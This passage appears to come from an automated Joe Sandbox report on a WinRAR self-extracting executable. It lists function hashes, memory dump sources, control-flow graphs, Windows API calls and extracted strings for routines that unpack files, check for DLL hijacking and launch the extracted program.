                  • API String ID: 1703294689-0
                  • Opcode ID: 32b187c1a67d218f4be992bc705fe445d3d892ad4abd60f13dae621c1b3cc8b0
                  • Instruction ID: 5b94c620886b4dd0ac4087b628e2e9c93a58759f7b87203c0e767ef848913f7e
                  • Opcode Fuzzy Hash: 32b187c1a67d218f4be992bc705fe445d3d892ad4abd60f13dae621c1b3cc8b0
                  • Instruction Fuzzy Hash: BFE0B632004A4CAFCF21AF68DD0DE893F69FB94741F108414F9459A272DB35EE46DB94
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 968254cfbce95c34411c4373d27fae51887c87cfe38b7934a2f54960df719833
                  • Instruction ID: 557f5dbef42310b474c37d521ff30c10c8ff5e6105ea59a47854d973fae9d10e
                  • Opcode Fuzzy Hash: 968254cfbce95c34411c4373d27fae51887c87cfe38b7934a2f54960df719833
                  • Instruction Fuzzy Hash: 24822B70904246AEDF25DF74C895BFEBFB9BF56300F0844BAE8599B142DB315A48CB60
                  APIs
                  • __EH_prolog.LIBCMT ref: 005AAEE5
                    • Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                    • Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-3472986185
                  • Opcode ID: 19a8c7231c51c87d74a2ab55344dcd6ff88708cca4ed2a8128378611b3276dbe
                  • Instruction ID: cc1c0892c359244210326bdf6f42dd6effff127f9719b115391248e533984165
                  • Opcode Fuzzy Hash: 19a8c7231c51c87d74a2ab55344dcd6ff88708cca4ed2a8128378611b3276dbe
                  • Instruction Fuzzy Hash: 3E42D6B1944245BEEF21ABA49C4EFBE7F7CBB62704F000056F245E61D2DB784948DBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 257 5a00cf-5a00ee call 5ae360 GetModuleHandleW 260 5a00f0-5a0107 GetProcAddress 257->260 261 5a0154-5a03b2 257->261 264 5a0109-5a011f 260->264 265 5a0121-5a0131 GetProcAddress 260->265 262 5a03b8-5a03c3 call 5b70dd 261->262 263 5a0484-5a04b3 GetModuleFileNameW call 59bc85 call 59fe56 261->263 262->263 274 5a03c9-5a03fa GetModuleFileNameW CreateFileW 262->274 279 5a04b5-5a04bf call 59acf5 263->279 264->265 265->261 266 5a0133-5a0152 265->266 266->261 276 5a0478-5a047f CloseHandle 274->276 277 5a03fc-5a040a SetFilePointer 274->277 276->263 277->276 280 5a040c-5a0429 ReadFile 277->280 285 5a04cc 279->285 286 5a04c1-5a04c5 call 5a0085 279->286 280->276 281 5a042b-5a0450 280->281 283 5a046d-5a0476 call 59fbd8 281->283 283->276 294 5a0452-5a046c call 5a0085 283->294 289 5a04ce-5a04d0 285->289 291 5a04ca 286->291 292 5a04f2-5a0518 call 59bcfb GetFileAttributesW 289->292 293 5a04d2-5a04f0 CompareStringW 289->293 291->289 296 5a051a-5a051e 292->296 301 5a0522 292->301 293->292 293->296 294->283 296->279 300 5a0520 296->300 302 5a0526-5a0528 300->302 301->302 303 5a052a 302->303 304 5a0560-5a0562 302->304 307 5a052c-5a0552 call 59bcfb GetFileAttributesW 303->307 305 5a0568-5a057f call 59bccf call 59acf5 304->305 306 5a066f-5a0679 304->306 317 5a0581-5a05e2 call 5a0085 * 2 call 59ddd1 call 59400a call 59ddd1 call 5a9f35 305->317 318 5a05e7-5a061a call 59400a AllocConsole 305->318 312 5a055c 307->312 313 5a0554-5a0558 307->313 312->304 313->307 315 5a055a 313->315 315->304 324 5a0667-5a0669 ExitProcess 317->324 323 5a061c-5a0661 GetCurrentProcessId AttachConsole call 5b35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 005A00E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005A00F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005A0127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 005A03D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005A03F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A0402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,005C3BA4,00000000), ref: 005A0421
                  • CloseHandle.KERNEL32(00000000), ref: 005A0479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 005A048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 005A04E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 005A0510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 005A054A
                    • Part of subcall function 005A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
                    • Part of subcall function 005A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2
                  • _swprintf.LIBCMT ref: 005A05BE
                  • _swprintf.LIBCMT ref: 005A060A
                    • Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D
                  • AllocConsole.KERNEL32 ref: 005A0612
                  • GetCurrentProcessId.KERNEL32 ref: 005A061C
                  • AttachConsole.KERNEL32(00000000), ref: 005A0623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 005A0649
                  • WriteConsoleW.KERNEL32(00000000), ref: 005A0650
                  • Sleep.KERNEL32(00002710), ref: 005A065B
                  • FreeConsole.KERNEL32 ref: 005A0661
                  • ExitProcess.KERNEL32 ref: 005A0669
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: <\$ ?\$(>\$(@\$0A\$4=\$8<\$<?\$@>\$@@\$D=\$DA\$DXGIDebug.dll$P<\$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;\$T?\$X>\$X@\$\A\$`=\$dwmapi.dll$kernel32$l<\$p>\$p?\$p@\$uxtheme.dll$x=\$|<\$>\$?\
                  • API String ID: 1201351596-3267786495
                  • Opcode ID: fb6ef2065fb3ddcfb16fed4245bb139ca077307ac01c25b2742bb7201ee461f2
                  • Instruction ID: 0d95be39db9b674373eef6dc08a083882979c5a86292dd606ee27deedb27d007
                  • Opcode Fuzzy Hash: fb6ef2065fb3ddcfb16fed4245bb139ca077307ac01c25b2742bb7201ee461f2
                  • Instruction Fuzzy Hash: 78D15FB15583899FD720AF90D84DF9FBFE8BF85704F40891DF589A6180D7B48A488F62

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 5abdf5-5abe0d call 5ae28c call 5ae360 411 5abe13-5abe3d call 5aaa36 406->411 412 5aca90-5aca9d 406->412 411->412 415 5abe43-5abe48 411->415 416 5abe49-5abe57 415->416 417 5abe58-5abe6d call 5aa6c7 416->417 420 5abe6f 417->420 421 5abe71-5abe86 call 5a17ac 420->421 424 5abe88-5abe8c 421->424 425 5abe93-5abe96 421->425 424->421 426 5abe8e 424->426 427 5aca5c-5aca87 call 5aaa36 425->427 428 5abe9c 425->428 426->427 427->416 439 5aca8d-5aca8f 427->439 430 5ac132-5ac134 428->430 431 5abea3-5abea6 428->431 432 5ac074-5ac076 428->432 433 5ac115-5ac117 428->433 430->427 436 5ac13a-5ac141 430->436 431->427 438 5abeac-5abf06 call 5a9da4 call 59b965 call 59a49d call 59a5d7 call 5970bf 431->438 432->427 437 5ac07c-5ac088 432->437 433->427 435 5ac11d-5ac12d SetWindowTextW 433->435 435->427 436->427 440 5ac147-5ac160 436->440 441 5ac08a-5ac09b call 5b7168 437->441 442 5ac09c-5ac0a1 437->442 494 5ac045-5ac05a call 59a52a 438->494 439->412 444 5ac168-5ac176 call 5b35b3 440->444 445 5ac162 440->445 441->442 448 5ac0ab-5ac0b6 call 5aab9a 442->448 449 5ac0a3-5ac0a9 442->449 444->427 462 5ac17c-5ac185 444->462 445->444 453 5ac0bb-5ac0bd 448->453 449->453 456 5ac0c8-5ac0e8 call 5b35b3 call 5b35de 453->456 457 5ac0bf-5ac0c6 call 5b35b3 453->457 482 5ac0ea-5ac0f1 456->482 483 5ac101-5ac103 456->483 457->456 466 5ac1ae-5ac1b1 462->466 467 5ac187-5ac18b 462->467 470 5ac296-5ac2a4 call 59fe56 466->470 471 5ac1b7-5ac1ba 466->471 467->466 473 5ac18d-5ac195 467->473 486 5ac2a6-5ac2ba call 5b17cb 470->486 475 5ac1bc-5ac1c1 471->475 476 5ac1c7-5ac1e2 471->476 473->427 479 5ac19b-5ac1a9 call 59fe56 473->479 475->470 475->476 495 5ac22c-5ac233 476->495 496 5ac1e4-5ac21e 476->496 479->486 490 5ac0f8-5ac100 call 5b7168 482->490 491 5ac0f3-5ac0f5 482->491 483->427 485 5ac109-5ac110 call 5b35ce 483->485 485->427 505 5ac2bc-5ac2c0 486->505 506 5ac2c7-5ac318 call 59fe56 call 5aa8d0 GetDlgItem SetWindowTextW SendMessageW call 5b35e9 486->506 490->483 491->490 512 5abf0b-5abf1f SetFileAttributesW 494->512 513 5ac060-5ac06f call 59a4b3 494->513 498 5ac261-5ac284 call 5b35b3 * 2 495->498 499 5ac235-5ac24d call 5b35b3 495->499 529 5ac222-5ac224 496->529 530 5ac220 496->530 498->486 534 5ac286-5ac294 call 59fe2e 498->534 499->498 516 5ac24f-5ac25c call 59fe2e 499->516 505->506 511 5ac2c2-5ac2c4 505->511 540 5ac31d-5ac321 506->540 511->506 517 5abfc5-5abfd5 GetFileAttributesW 512->517 518 5abf25-5abf58 call 59b4f7 call 59b207 call 5b35b3 512->518 513->427 516->498 517->494 527 5abfd7-5abfe6 DeleteFileW 517->527 550 5abf5a-5abf69 call 5b35b3 518->550 551 5abf6b-5abf79 call 59b925 518->551 527->494 533 5abfe8-5abfeb 527->533 529->495 530->529 537 5abfef-5ac01b call 59400a GetFileAttributesW 533->537 534->486 547 5abfed-5abfee 537->547 548 5ac01d-5ac033 MoveFileW 537->548 540->427 544 5ac327-5ac33b SendMessageW 540->544 544->427 547->537 548->494 549 5ac035-5ac03f MoveFileExW 548->549 549->494 550->551 556 5abf7f-5abfbe call 5b35b3 call 5af350 550->556 551->513 551->556 556->517
                  APIs
                  • __EH_prolog.LIBCMT ref: 005ABDFA
                    • Part of subcall function 005AAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 005AAAFE
                  • SetWindowTextW.USER32(?,?), ref: 005AC127
                  • _wcsrchr.LIBVCRUNTIME ref: 005AC2B1
                  • GetDlgItem.USER32(?,00000066), ref: 005AC2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 005AC2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,005DA472), ref: 005AC30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005AC335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  • API String ID: 3564274579-312220925
                  • Opcode ID: 78c199d0c30944877ac9a70ba9ef629da315363fc78cc98985ac86c6636a86ec
                  • Instruction ID: e75bf0314ec59b3b54df90b68e43bdb3c0f47d31ff2a29196b49b8fbd20a5b06
                  • Opcode Fuzzy Hash: 78c199d0c30944877ac9a70ba9ef629da315363fc78cc98985ac86c6636a86ec
                  • Instruction Fuzzy Hash: 0FE15E76D04119AADF25DBA0DC49EEF7FBCBF5A310F0040A6E509E2091EB749A84DB60

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 561 59d341-59d378 call 5ae28c call 5ae360 call 5b15e8 568 59d3ab-59d3b4 call 59fe56 561->568 569 59d37a-59d3a9 GetModuleFileNameW call 59bc85 call 59fe2e 561->569 573 59d3b9-59d3dd call 599619 call 5999b0 568->573 569->573 580 59d7a0-59d7a6 call 599653 573->580 581 59d3e3-59d3eb 573->581 587 59d7ab-59d7bb 580->587 582 59d409-59d438 call 5b5a90 * 2 581->582 583 59d3ed-59d405 call 5a3781 * 2 581->583 595 59d43b-59d43e 582->595 594 59d407 583->594 594->582 596 59d56c-59d58f call 599d30 call 5b35d3 595->596 597 59d444-59d44a call 599e40 595->597 596->580 606 59d595-59d5b0 call 599bf0 596->606 601 59d44f-59d476 call 599bf0 597->601 607 59d47c-59d484 601->607 608 59d535-59d538 601->608 618 59d5b9-59d5cc call 5b35d3 606->618 619 59d5b2-59d5b7 606->619 610 59d4af-59d4ba 607->610 611 59d486-59d48e 607->611 612 59d53b-59d55d call 599d30 608->612 615 59d4bc-59d4c8 610->615 616 59d4e5-59d4ed 610->616 611->610 614 59d490-59d4aa call 5b5ec0 611->614 612->595 630 59d563-59d566 612->630 634 59d52b-59d533 614->634 635 59d4ac 614->635 615->616 621 59d4ca-59d4cf 615->621 623 59d519-59d51d 616->623 624 59d4ef-59d4f7 616->624 618->580 640 59d5d2-59d5ee call 5a137a call 5b35ce 618->640 626 59d5f1-59d5f8 619->626 621->616 629 59d4d1-59d4e3 call 5b5808 621->629 623->608 625 59d51f-59d522 623->625 624->623 631 59d4f9-59d513 call 5b5ec0 624->631 625->607 637 59d5fa 626->637 638 59d5fc-59d625 call 59fdfb call 5b35d3 626->638 629->616 645 59d527 629->645 630->580 630->596 631->580 631->623 634->612 635->610 637->638 650 59d633-59d649 638->650 651 59d627-59d62e call 5b35ce 638->651 640->626 645->634 654 59d64f-59d65d 650->654 655 59d731-59d757 call 59ce72 call 5b35ce * 2 650->655 651->580 657 59d664-59d669 654->657 689 59d759-59d76f call 5a3781 * 2 655->689 690 59d771-59d79d call 5b5a90 * 2 655->690 659 59d97c-59d984 657->659 660 59d66f-59d678 657->660 664 59d72b-59d72e 659->664 665 59d98a-59d98e 659->665 662 59d67a-59d67e 660->662 663 59d684-59d68b 660->663 662->659 662->663 668 59d691-59d6b6 663->668 669 59d880-59d891 call 59fcbf 663->669 664->655 670 59d9de-59d9e4 665->670 671 59d990-59d996 665->671 676 59d6b9-59d6de call 5b35b3 call 5b5808 668->676 691 59d897-59d8c0 call 59fe56 call 5b5885 669->691 692 59d976-59d979 669->692 674 59da0a-59da2a call 59ce72 670->674 675 59d9e6-59d9ec 670->675 677 59d99c-59d9a3 671->677 678 59d722-59d725 671->678 697 59da02-59da05 674->697 675->674 684 59d9ee-59d9f4 675->684 709 59d6e0-59d6ea 676->709 710 59d6f6 676->710 680 59d9ca 677->680 681 59d9a5-59d9a8 677->681 678->657 678->664 693 59d9cc-59d9d9 680->693 687 59d9aa-59d9ad 681->687 688 59d9c6-59d9c8 681->688 684->678 694 59d9fa-59da01 684->694 698 59d9af-59d9b2 687->698 699 59d9c2-59d9c4 687->699 688->693 689->690 690->580 691->692 721 59d8c6-59d93c call 5a1596 call 59fdfb call 59fdd4 call 59fdfb call 5b58d9 691->721 692->659 693->678 694->697 704 59d9be-59d9c0 698->704 705 59d9b4-59d9b8 698->705 699->693 704->693 705->684 711 59d9ba-59d9bc 705->711 709->710 715 59d6ec-59d6f4 709->715 716 59d6f9-59d6fd 710->716 711->693 715->716 716->676 720 59d6ff-59d706 716->720 722 59d70c-59d71a call 59fdfb 720->722 723 59d7be-59d7c1 720->723 754 59d94a-59d95f 721->754 755 59d93e-59d947 721->755 730 59d71f 722->730 723->669 725 59d7c7-59d7ce 723->725 728 59d7d0-59d7d4 725->728 729 59d7d6-59d7d7 725->729 728->729 732 59d7d9-59d7e7 728->732 729->725 730->678 735 59d7e9-59d7ec 732->735 736 59d808-59d830 call 5a1596 732->736 738 59d7ee-59d803 735->738 739 59d805 735->739 744 59d853-59d85b 736->744 745 59d832-59d84e call 5b35e9 736->745 738->735 738->739 739->736 748 59d85d 744->748 749 59d862-59d87b call 59dd6b 744->749 745->730 748->749 749->730 756 59d960-59d967 754->756 755->754 757 59d969-59d96d 756->757 758 59d973-59d974 756->758 757->730 757->758 758->756
                  APIs
                  • __EH_prolog.LIBCMT ref: 0059D346
                  • _wcschr.LIBVCRUNTIME ref: 0059D367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0059D328,?), ref: 0059D382
                  • __fprintf_l.LIBCMT ref: 0059D873
                    • Part of subcall function 005A137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0059B652,00000000,?,?,?,00010406), ref: 005A1396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$$9\$*messages***$*messages***$@%s:$R$RTL$a
                  • API String ID: 4184910265-575384938
                  • Opcode ID: 761030863f3429a63dcfc30040963867f52948f09298206b6f2c7738ee6c976e
                  • Instruction ID: 79d7f2c6927bc7889f256dc67020ea0e3d2c2c48ea222aa116d5e7669b2cbc0d
                  • Opcode Fuzzy Hash: 761030863f3429a63dcfc30040963867f52948f09298206b6f2c7738ee6c976e
                  • Instruction Fuzzy Hash: 7C12A0B190021A9ADF24EFA4DC85BEEBFB5FF44304F104569F506B7192EB70AA44CB64

                  Control-flow Graph

                  APIs
                    • Part of subcall function 005AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AAC85
                    • Part of subcall function 005AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AAC96
                    • Part of subcall function 005AAC74: IsDialogMessageW.USER32(00010406,?), ref: 005AACAA
                    • Part of subcall function 005AAC74: TranslateMessage.USER32(?), ref: 005AACB8
                    • Part of subcall function 005AAC74: DispatchMessageW.USER32(?), ref: 005AACC2
                  • GetDlgItem.USER32(00000068,005EECB0), ref: 005ACB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,005AA632,00000001,?,?,005AAECB,005C4F88,005EECB0), ref: 005ACB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 005ACBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,005C35B4), ref: 005ACBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 005ACBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 005ACBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 005ACC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 005ACC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 005ACC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 005ACC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,005C431C), ref: 005ACC76
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  • API String ID: 3569833718-2967466578
                  • Opcode ID: ac5c5b4d9de162685457ddbe0dd6872e9ced2710779dfd6577c3badb7f7c5c78
                  • Instruction ID: d6d43fcfa2409bf116f6ba5d06b0ef455a98bbc7946f6861cbf05b9686ad1357
                  • Opcode Fuzzy Hash: ac5c5b4d9de162685457ddbe0dd6872e9ced2710779dfd6577c3badb7f7c5c78
                  • Instruction Fuzzy Hash: 7831AEB214A342BBE311DB20EC4AFAB7FACEB92714F000509F651D6191DB694A08E776

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 795 5ace22-5ace3a call 5ae360 798 5ad08b-5ad093 795->798 799 5ace40-5ace4c call 5b35b3 795->799 799->798 802 5ace52-5ace7a call 5af350 799->802 805 5ace7c 802->805 806 5ace84-5ace91 802->806 805->806 807 5ace93 806->807 808 5ace95-5ace9e 806->808 807->808 809 5acea0-5acea2 808->809 810 5aced6 808->810 811 5aceaa-5acead 809->811 812 5aceda-5acedd 810->812 813 5ad03c-5ad041 811->813 814 5aceb3-5acebb 811->814 815 5acedf-5acee2 812->815 816 5acee4-5acee6 812->816 819 5ad043 813->819 820 5ad036-5ad03a 813->820 817 5acec1-5acec7 814->817 818 5ad055-5ad05d 814->818 815->816 821 5acef9-5acf0e call 59b493 815->821 816->821 822 5acee8-5aceef 816->822 817->818 824 5acecd-5aced4 817->824 826 5ad05f-5ad061 818->826 827 5ad065-5ad06d 818->827 825 5ad048-5ad04c 819->825 820->813 820->825 830 5acf10-5acf1d call 5a17ac 821->830 831 5acf27-5acf32 call 59a180 821->831 822->821 828 5acef1 822->828 824->810 824->811 825->818 826->827 827->812 828->821 830->831 836 5acf1f 830->836 837 5acf4f-5acf5c ShellExecuteExW 831->837 838 5acf34-5acf4b call 59b239 831->838 836->831 840 5ad08a 837->840 841 5acf62-5acf6f 837->841 838->837 840->798 843 5acf82-5acf84 841->843 844 5acf71-5acf78 841->844 845 5acf9b-5acfba call 5ad2e6 843->845 846 5acf86-5acf8f 843->846 844->843 847 5acf7a-5acf80 844->847 848 5acff1-5acffd CloseHandle 845->848 865 5acfbc-5acfc4 845->865 846->845 856 5acf91-5acf99 ShowWindow 846->856 847->843 847->848 849 5ad00e-5ad01c 848->849 850 5acfff-5ad00c call 5a17ac 848->850 854 5ad079-5ad07b 849->854 855 5ad01e-5ad020 849->855 850->849 862 5ad072 850->862 854->840 859 5ad07d-5ad07f 854->859 855->854 860 5ad022-5ad028 855->860 856->845 859->840 863 5ad081-5ad084 ShowWindow 859->863 860->854 864 5ad02a-5ad034 860->864 862->854 863->840 864->854 865->848 866 5acfc6-5acfd7 GetExitCodeProcess 865->866 866->848 867 5acfd9-5acfe3 866->867 868 5acfea 867->868 869 5acfe5 867->869 868->848 869->868
                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 005ACF54
                  • ShowWindow.USER32(?,00000000), ref: 005ACF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 005ACFCF
                  • CloseHandle.KERNEL32(?), ref: 005ACFF5
                  • ShowWindow.USER32(?,00000001), ref: 005AD084
                    • Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  • API String ID: 3686203788-2452507128
                  • Opcode ID: 881cbc2a7debb90ef45fa3fc7b2b2e8e69fc388f04f5a29232d608dadfdec3fe
                  • Instruction ID: 4e62c5aff3f13ddc6eea03a173b659630fc0e2e1628ee41ccbd14a585e110cf6
                  • Opcode Fuzzy Hash: 881cbc2a7debb90ef45fa3fc7b2b2e8e69fc388f04f5a29232d608dadfdec3fe
                  • Instruction Fuzzy Hash: 1861D4704043809EDB31AF24D808AAFBFF9BF97340F04481AF5C697251E7719989DBA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
